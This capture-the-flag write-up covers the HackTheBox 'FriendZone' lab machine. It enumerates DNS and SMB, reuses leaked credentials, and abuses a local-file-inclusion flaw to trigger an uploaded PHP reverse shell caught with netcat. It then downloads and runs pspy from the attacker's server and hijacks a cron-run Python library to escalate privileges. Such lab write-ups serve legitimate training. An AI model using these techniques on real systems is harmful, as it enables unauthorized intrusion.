HTB Writeup - FriendZone

FriendZone is an "Easy" difficulty Machine on

First Step: Nmap Scan of the Machine
nmap -n -v -Pn -p- -A --reason -oN fz.txt 

Ubuntu, with a few things worth looking at
Primary areas of opportunity: FTP/21, HTTP/80, SMB/445
Interesting port: TCP/53
21/tcp  open  ftp         syn-ack ttl 63 vsftpd 3.0.3
22/tcp  open  ssh         syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
53/tcp  open  domain      syn-ack ttl 63
80/tcp  open  http        syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
139/tcp open  netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open  ssl/http    syn-ack ttl 63 Apache httpd 2.4.29
445/tcp open  netbios-ssn syn-ack ttl 63 Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)

I added a static entry to my /etc/hosts file  friendzone.htb

Checking to see if we can find anything with DNS since the port is apparently open, but  nslookup shows nothing

 DNS zone transfer shows nothing

Time to checkout something else.
Check the web browser first:

 Nothing on the page worth mentioning, nothing in the source either.

Time to Check HTTPS :


 I accept the certificate, but the page doesn't load

I check the cert, and found the CN was set to


 Added a new entry into /etc/hosts

Nslookup still didnt give me anything good, but I was able to use the DNS Zone Transfer to find multiple hostnames used by this box.

Added 3 new entries into my /etc/hosts file

DNS Entry 1), was just a gif of a dude trying desperately to escape the friendzone.
 I was able to enumerate and find /admin

but was empty. So I think this is a dead end...

DNS Entry 2), an admin portal for something. Sweet!

I busted an image folder, but no access without logging in first. 
We'll revisit for sure

DNS Entry 3), an upload page! Here, I was thiking LFI for sure.
I uploaded the image, to verify what a working version of this looks like

So it says successful, and provides what looks like an epoch timestamp.

No matter what I did here was I able to determine where these were ending up. So, perhaps useful, but I'll just keep it in mind for later.

 DNS Entry 4) does nothing, definition of a dead end.

Time to see what other information we can find. Let's check 
smbclient -L friendzone.htb 

# Create a Directory for mapping the shares
mkdir sambas
# Access the folder
cd sambas
# Create 3 folders for their Network Mappings
mkdir Files
mkdir general
mkdir Development

#Attempt to Mount all 3 folders at the same time using the guest credentials
mount // ~/sambas/Files -o username=guest,password=''
mount // ~/sambas/general -o username=guest,password=''
mount // ~/sambas/Development -o username=guest,password=''

I was able to map 2 of the 3 drives using the guest login!

We can see the two that accepted the connections are Development and general. In general we're able to find a file names 'cred.txt' with some credentials in it.
Another nice thing about doing the samba shares in this manner, for me anyway, is you can use the GUI and keep notes in an open notepad. Do what you prefer though!

/general folder
So I think we've discovered some good information here based on the other folks using the Development folder. There is some kind of LFI at play for sure.

/Development folder


Let's try our login credentials on the portal


Excellent, were in, and its leading us toward a dashboard!

The dashboard has even more instructions for us on  how to use its URL Encoding

So it brings up an image (that a.jpg and b.jpg work for), and pagename=timestamp. 

Of course we have to check and see if timestamp is a local php file, thats exactly what it is. So this will be where we hunt down our LFI Enumeration. 
Now, this is where I got pissed trying to figure out where to search for the folders for. Folks were rebooting the box like mad, sticking pagename=dashboard into the url above which im sure was killing the box, which im also guilty of see below...

So i stepped away and came back after about 2 weeks. 

This helped as when I was reviewing my screenshots from my first dive in I noticed in the smbclient screenshot had a comment labeling the "Files" share as '/etc/Files'.
If you remember we had no access to this folder, so this may be nothing, but i moved forward with the assumption that /etc/general and /etc/Development (maybe /etc/Dev) were the folder locations for those shares.

I created a simple php file with <?php echo 'hello world'; ?> inside to test, and named it dbtn. and saved it in the /sambas/Development folder.


This script is consistently one of the best for php reverse shells 

I updated the ip and ports in the reverse script, and uploaded it to the /sambas/Development folder

Now we set the Kali box to listen on port 9595
nc -v -n -l -p 9595 

We then go back to our browser, and kick off the remote shell 

We check the user folder and find the user flag

After hunting around for a LONG time i found a database username and password

Which thankfully let me in via SSH:

I was grepping "ps aux" to see what I could find for services.

I realize that because I spotted this I skipped a HUGE part the process here, but I did work my way back, after I got the root flag. That information will be at the bottom of this, and was a great to learn!

I found multiple files which is worth noting

I looked into the file the user was and found the following command at the end of the file:

So it seems that he's piggybacking on a python script which is running at a regular interval. Likely a cron, or maybe something triggered through the web interface.

I wasn't sure where the root flag was specifically, so I grabbed 3 locations I thought it might be (knowing full well the Desktop and Root werent even likely to exist)

About 5 minutes later I checked my /home folder, and the only file with anything in it was moo3.txt, which held the root flag.

 Ok, so back to the piece I skipped... remember i spotted this guy editing the python file directly...

 To the google! I found an application that lets me see all processes running, even without root. Ironically, you can see in the screenshot above someone was running .pspy, so this is likely the exact same way he figured it out too.

GitHub for the win!

 I cloned the repo from github

Started up my super basic web server
systemctl start apache2 

Copied the python script into my web folder
cp pspy64 /var/www/html/ 

 Downloaded the .py file into the friendzone.htb /home/friend/test folder
wget http://10.10.x.x/pspy64

Ran into some permission issues

Fixed permissions, and it started checking for all running processes
chmod 777 pspy64 && ./pspy64

 The output screamed for a few seconds before calming down, but within 2-3 minutes i saw the following

 Checked the file and found nothing of consequence other than the 'import os' pieces which refer back to the file in the python2.7 library folder.

 What I can't figure out how they determined they needed to edit the 2.7 file opposed to the any of the 3 python3 folders...

Dead Ends and Rabbit Holes

    • was just a gif of a dude trying desperately to escape the friendzone.
    • /admin went nowhere
  • FTP
    • Never got in, and spent a while trying to identify any vulnerabilities to no avail.
  • Wfuzz
    • I love wfuzz... but ince this used to much SSL I wasnt able to use it, but blew a lot of time trying to figure out a way fuzz even if it was HTTPS. 
    • I assumed it was a broken script on the front end so I wasted a lot of time trying to fix the input object names. In the end the script on the backend (upload.php) literally doesn't do anything with the file. It just checks if there is one, then tells you it was successful.
    • Finding the right folder to abuse LFI. In the end the answer was simple... and if I spent time looking for clues too it would have been faster.

Categories: All, HackTheBox